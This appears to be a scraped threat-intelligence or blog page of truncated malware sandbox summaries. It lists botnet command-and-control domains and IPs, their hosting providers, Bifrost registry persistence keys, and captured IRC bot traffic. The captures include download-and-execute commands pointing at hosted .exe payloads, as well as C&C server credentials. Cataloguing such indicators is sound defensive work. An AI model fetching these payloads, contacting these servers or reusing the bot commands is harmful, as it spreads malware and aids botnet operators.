DNS Lookup Host Name IP Address medogrgr.no-ip.biz 188.49.5.146 Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{9D71D88C-C598-4935-C5D1-43AA4DB90836} “stubpath” = [REG_EXPAND_SZ, value: C:WINDOWSBifrostserver.exe s] HKEY_LOCAL_MACHINESOFTWAREBifrost “nck” = [REG_BINARY, size: 16 bytes] HKEY_CURRENT_USERSoftwareBifrost “klg” = [REG_BINARY, size: 1 bytes] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftAdvanced INF Setup “AdvpackLogFile” HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminalRead more...
98.126.44.98(Botnet hosted with kryptservers.com USA California)
still USA hosting involved in Botnet hosting Remote Host Port Number 208.53.183.219 80 208.53.183.73 80 208.53.183.92 80 98.126.44.98 8100 PASS laorosr ircd here MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30Read more...
bss-crypt.no-ip.info
Processes CreatedPId Process Name Image Name 0x378 cc.exe C:WINDOWScc.exe Threads CreatedPId Process Name TId Start Start Mem Win32 Start Win32 Start Mem 0x2ac lsass.exe 0x298 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE 0x348 svchost.exe 0xf8 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE 0x378 cc.exe 0x374 0x7c810867 MEM_IMAGE 0x4973f0 MEM_IMAGE 0x3f4 svchost.exe 0x67c 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE DNS QueriesDNS Query Text bss-crypt.no-ip.infoRead more...
ms.allnewdots.com(buterfly bot hosted in United States Woodstock Fdcservers.net)
yes again this hoster and again buterfly boter hosted in USA they prob dont know that the buterfly botnet creator was arrested by FBI IP Location: United States Woodstock Fdcservers.net Resolve Host: sys-047.leeware.com IP Address: 208.53.131.135 exe file hosted with fdcservers.net: http://74.63.78.13/bdnu.exe IP Location: United States Woodstock Fdcservers.net Resolve Host: roa.ecuaideas3.net IP Address: 74.63.78.13 ResolvedRead more...
gutyeaz.com
DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.6.2 gutyeaz.com 184.106.247.215 kadds.ru 91.211.117.127 rapidshare.com rapidshare.com 195.122.131.4 rs286l34.rapidshare.com rs286l34.rapidshare.com 62.67.1.87 UDP Connections Remote IP Address: 184.106.247.215 Port: 2727 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address: 184.106.247.215 Port: 2727 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s)Read more...
limon4ik.com(E-mail worm hosted with http://www.interserver.net/ US hosting)
DNS Lookup Host Name IP Address ssl.aukro.ua 193.23.48.228 ir.kagoshima-u.ac.jp 163.209.180.1 ss1.coressl.jp 202.172.28.253 www.billboxrecords.com.br 200.234.192.141 www.saredrogarias.com.br 74.52.66.226 forum.gryada.org.ua 193.169.188.64 loja.tray.com.br 201.20.35.20 masterkey.com.ua 212.82.216.42 isu2.tup.km.ua 212.111.198.59 www.stone.co.ua 67.15.97.220 www.mlh.co.jp 115.125.150.234 sou wow.merlin.org.ua 91.203.146.30 global-host.com.ua ex2.broadser form.cao.go.jp 203.180.136.89 bunker.org.ua 195.214.214.53 UDP Connections Remote IP Address: 10.1.1.1 Port: 53 Send Datagram: 2 packet(s) of size 37 Recv Datagram: packet(s)Read more...
ihax.sytes.net(CableLink109-243.telefonia.InterCable.net Mexico)
ihax.sytes.net: type A, class IN, addr 201.172.109.243 api.ipinfodb.com: type A, class IN, addr 67.212.74.82 Data: GET /v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off HTTP/1.1 Raw: ..’.?…’..K..E..Jag@….q..o.C.JR.R.P..…8.”P.…C..GET /v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off HTTP/1.1..Host: api.ipinfodb.com..Cache-Control: no-cache..User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5..Connection: closed….
91.203.146.65(Botnet hosted with http://goodnet.com.ua/ Ukraine)
Remote Host Port Number 173.193.205.116 8014 69.163.248.145 80 69.163.250.145 80 69.50.197.244 80 89.238.149.67 80 92.241.184.111 80 91.203.146.65 8878 port changed to 7276 USER duzlurcv duzlurcv duzlurcv :ajpenurz NICK ROIKiQGLO PONG :lols.nope.com MODE ROIKiQGLO +xi JOIN #maxi USERHOST ROIKiQGLO MODE #maxi +smntu Now talking in #maxi Topic On: [ #maxi ] [ =IxgN+TVR/M3693AU+b3Zymnqh7XjJ1xl8jRu0jdcrmWRb9Cr2BZAVxeyjwZ5PinlmrfYQ071m7u5f6tl0MGpVffGThs1UcXWLPEB2izDaRPHN8sxZILY/zc1b9ShwEHRBfKIZHRzdVWFQLUQ74SpuICbyIMK9U9yfLFnFvRV2Q1ry1d9NFrF1qzxS1kgf9/MG+tReUpUCS70eGoaIVQBELe+h1jgUQOlu6bKkas6aD8ro4e/ZSuWsr90pUDny6j8vHGNx99a/dFEw/gHLDmso9qbVB ] Topic By:Read more...
64.202.120.41(botnet hosted with hostforweb.com)
another botnet server hosted in US CHICAGO from www.hostforweb.com Remote Host Port Number 204.0.5.42 80 204.0.5.43 80 204.0.5.58 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 63.135.86.30 80 63.135.86.37 80 64.208.138.101 80 66.220.149.25 80 64.202.120.41 1234 PASS xxx ircd here NICK NEW-[USA|00|P|09511] USER XP-8613 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|09511] -ix JOIN #!nn! test PONG 22 MOTDRead more...
bbg.moiservice.com
DNS Lookup Host Name IP Address bbg.moiservice.com 74.117.174.82 i3ED6DA76.versanet.de 62.214.218.118 Opened listening TCP connection on port: 55907 Opened listening TCP connection on port: 113 C&C Server: 74.117.174.82:16667 Server Password: Username: laMer Nickname: XP|Ubd2 Channel: #lbl# (Password: lam) Channeltopic: : Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwaremIRC “DateUsed” = 1264705554 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “DisplayName” =Read more...